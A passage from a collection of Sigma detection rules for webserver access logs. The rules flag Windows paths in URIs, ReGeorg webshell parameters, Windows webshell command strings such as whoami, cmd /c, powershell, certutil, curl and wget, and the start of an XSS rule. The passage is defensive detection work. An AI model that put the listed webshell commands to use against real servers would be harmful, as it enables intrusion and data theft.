- 'GIS - AppSec Team - Project Vision'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/web/webserver_generic/web_susp_windows_path_uri.yml
================================================
title: Suspicious Windows Strings In URI
id: 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e
status: test
description: Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication
references:
- https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-06
modified: 2023-01-02
tags:
- attack.persistence
- attack.exfiltration
- attack.t1505.003
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains:
- '=C:/Users'
- '=C:/Program%20Files'
- '=C:/Windows'
- '=C%3A%5CUsers'
- '=C%3A%5CProgram%20Files'
- '=C%3A%5CWindows'
condition: selection
falsepositives:
- Legitimate application and websites that use windows paths in their URL
level: high
================================================
FILE: rules/web/webserver_generic/web_webshell_regeorg.yml
================================================
title: Webshell ReGeorg Detection Via Web Logs
id: 2ea44a60-cfda-11ea-87d0-0242ac130003
status: test
description: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.
references:
- https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3
- https://github.com/sensepost/reGeorg
author: Cian Heasley
date: 2020-08-04
modified: 2023-01-02
tags:
- attack.persistence
- attack.t1505.003
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains:
- 'cmd=read'
- 'connect&target'
- 'cmd=connect'
- 'cmd=disconnect'
- 'cmd=forward'
filter:
cs-referer: null
cs-user-agent: null
cs-method: POST
condition: selection and filter
falsepositives:
- Web applications that use the same URL parameters as ReGeorg
level: high
================================================
FILE: rules/web/webserver_generic/web_win_webshells_in_access_logs.yml
================================================
title: Windows Webshell Strings
id: 7ff9db12-1b94-4a79-ba68-a2402c5d6729
status: test
description: Detects common commands used in Windows webshells
references:
- https://bad-jubies.github.io/RCE-NOW-WHAT/
- https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2017-02-19
modified: 2022-11-18
tags:
- attack.persistence
- attack.t1505.003
logsource:
category: webserver
detection:
selection_method:
cs-method: 'GET'
selection_keywords:
# The "%20" is URL encoded version of the space
# The "%2B" is URL encoded version of the "+"
- '=whoami'
- '=net%20user'
- '=net+user'
- '=net%2Buser'
- '=cmd%20/c%'
- '=cmd+/c+'
- '=cmd%2B/c%'
- '=cmd%20/r%'
- '=cmd+/r+'
- '=cmd%2B/r%'
- '=cmd%20/k%'
- '=cmd+/k+'
- '=cmd%2B/k%'
- '=powershell%'
- '=powershell+'
- '=tasklist%'
- '=tasklist+'
- '=wmic%'
- '=wmic+'
- '=ssh%'
- '=ssh+'
- '=python%'
- '=python+'
- '=python3%'
- '=python3+'
- '=ipconfig'
- '=wget%'
- '=wget+'
- '=curl%'
- '=curl+'
- '=certutil'
- '=copy%20%5C%5C'
- '=dsquery%'
- '=dsquery+'
- '=nltest%'
- '=nltest+'
condition: all of selection_*
falsepositives:
- Web sites like wikis with articles on os commands and pages that include the os commands in the URLs
- User searches in search boxes of the respective website
level: high
================================================
FILE: rules/web/webserver_generic/web_xss_in_access_logs.yml
================================================
title: Cross Site Scripting Strings
id: 65354b83-a2ea-4ea6-8414-3ab38be0d409
status: test
description: Detects XSS attempts injected via GET requests in access logs
references:
- https://github.com/payloadbox/xss-payload-list
- https://portswigger.net/web-security/cross-site-scripting/contexts
author: Saw Win Naung, Nasreddine Bencherchali
date: 2021-08-15
modified: 2022-06-14
tags:
- attack.initial-access
- attack.t1189
logsource:
category: webserver
detection:
select_method:
cs-method: 'GET'
keywords:
- '=